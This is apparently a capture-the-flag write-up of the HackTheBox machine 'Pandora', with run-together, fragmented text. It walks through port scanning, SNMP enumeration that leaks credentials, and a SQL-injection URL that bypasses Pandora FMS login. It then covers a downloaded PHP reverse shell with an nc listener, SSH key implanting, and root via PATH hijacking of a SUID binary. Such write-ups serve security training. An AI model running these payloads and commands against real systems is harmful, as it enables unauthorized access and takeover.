nmap. We can quickly scan for open ports and store them in a variable:
ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.136 | grep "^[0-9]" | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//). Then, we can scan those specific ports in depth by running
nmap's built-in scripts:
nmap -p$ports -sC -sV 10.10.11.136.
sudo nmap -p- -sU -r -T5 10.10.11.136 -v(
-rspecifies that ports will be scanned sequentially instead of randomly. we do this because services are more likely to be running on ports 1-1000.):
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.136/FUZZ:
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtwordlist also doesn't find anything useful.
panda.htb, so we'll add that to our
echo "10.10.11.136 panda.htb" | sudo tee -a /etc/hosts. Trying to find other possible virtual hosts with
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://panda.htb -H "Host: FUZZ.panda.htb" -fl 908for both
pandora.htbdoes not yield any results.
sudo nmap -p161 -sU -T5 -sC -sV 10.10.11.136 > nmap_port161udp_scan.txt: nmap_port161udp_scan.txt. This scan is quite large, which is why we pipe it into a file.
snmpwalkattempts to walk through all of the available MIBs and retrieve the information. "Before running our
snmpwalkcommand, we should install
snmp-mibs-downloader. This package will install all of the MIB files that aren’t included by default due to licensing issues" (quote from epi052.gitlab.io). We will run
sudo apt-get install snmp-mibs-downloader; sudo download-mibsto get the MIB files.
snmpwalkoutput and the
nmapoutput because we used
-sCto run scripts (specifically the
snmp-processesnmap script was run). Looking at process id
855in either script's output shows
/bin/shbeing ran withe parameters
-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23':
cat /etc/passwdshows that the user with id
user.txtflag is in
matt's home folder, which we can see by running
/usr/bin/host_check -u daniel -p HotelBabylon23produces:
localhost.localdomain. Let's see what it is with
curl localhost.localdomain, which shows
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">. Running
curl localhost.localdomain/pandora_console/displays a whole website. Running
(netstat -punta || ss --ntpu) | grep "127.0"to list open local ports doesn't show anything out of the ordinary so this web sever must be running as a different user:
/var/www/since we know this machine is using Apache due to our first
nmapscan. There are two folders in
html, which contains the original website we accessed on port
pandora, which contains the new site we found running locally.
ls -la pandora_console/shows a lot of files owned by
matt's user so this is almost certainly our lateral movement vector.
cat /etc/apache2/sites-enabled/pandora.confto look at the Apache confiuration for this site shows that it is indeed running under the
80. So, let's forward that to our attack machine with
ssh -L 8080:localhost:80 [email protected]. Now, navigating to
http://localhost:8080/pandora_console/brings us to a login page.
daniel:HotelBabylon23results in a message appearing that says "User only can use the API."
8080since that is what we are using. Now, going to
http://localhost:8080/pandora_console/include/chart_generator.php?session_id=a%27%20UNION%20SELECT%20%27a%27,1,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20FROM%20tsessions_php%20WHERE%20%271%27=%271in your browser and then navigating back to
http://localhost:8080/pandora_console/will log you into PandoraFMS as an administrator. A video of this happening can be seen on the blog post linked from the repo: Pandora FMS 742: Critical Code Vulnerabilities Explained.
adminin the top right brings you to a page where you can edit your user's details. I changed the password to
adminand then clicked "Update" at the bottom.
linux/http/pandora_ping_cmd_execalso fails even after I created a new user in the interface. This exploit-db script fails as well. Also, TheCyberGeek/CVE-2020-5844 fails too. TheCyberGeek's script probably is supposed to work since he is one of the creators of this box. Additionally, after solving the box, I found this repo: shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated. So, this exploit might also work.
Admin tools > File manageron the left. So, lets get a PHP reverse shell with
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php, edit in our ip address and port, start a listener with
nc -nvlp 28600and then go to
http://localhost:8080/pandora_console/images/php-reverse-shell.phpon the server to get a reverse shell. This is successful!
run implant.authorized_key key=/home/kali/.ssh/id_rsain
pwncat. I set the permissions of the
.sshfolder to be what they should be with
chmod 700 .ssh && chmod 600 .ssh/authorized_keys.
cat /home/matt/user.txtto get the
ls -la /usr/bin/pandora_backupshows that this is a SUID binary. Running the actual
/usr/bin/pandora_backupscript appears to create a
tararchive of the
download /usr/bin/pandora_backupto download it to our local machine with
pwncatsince the target machine does not have the
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*in the output. So, it looks like it is just running the
tarbinary from a relative path. We can create a new file called
tarin our home directory that simply runs
mkdir ~/bin; echo "/bin/bash" > ~/bin/tar. Set the new "tar" file to executable with
chmod +x ~/bin/tar. Now, we can add that to our path ahead of any other directory with
export PATH=/home/matt/bin:$PATH. Now, we can run the SUID binary again:
cat /root/root.txtto get the
run implant.authorized_key key=/home/kali/.ssh/id_rsain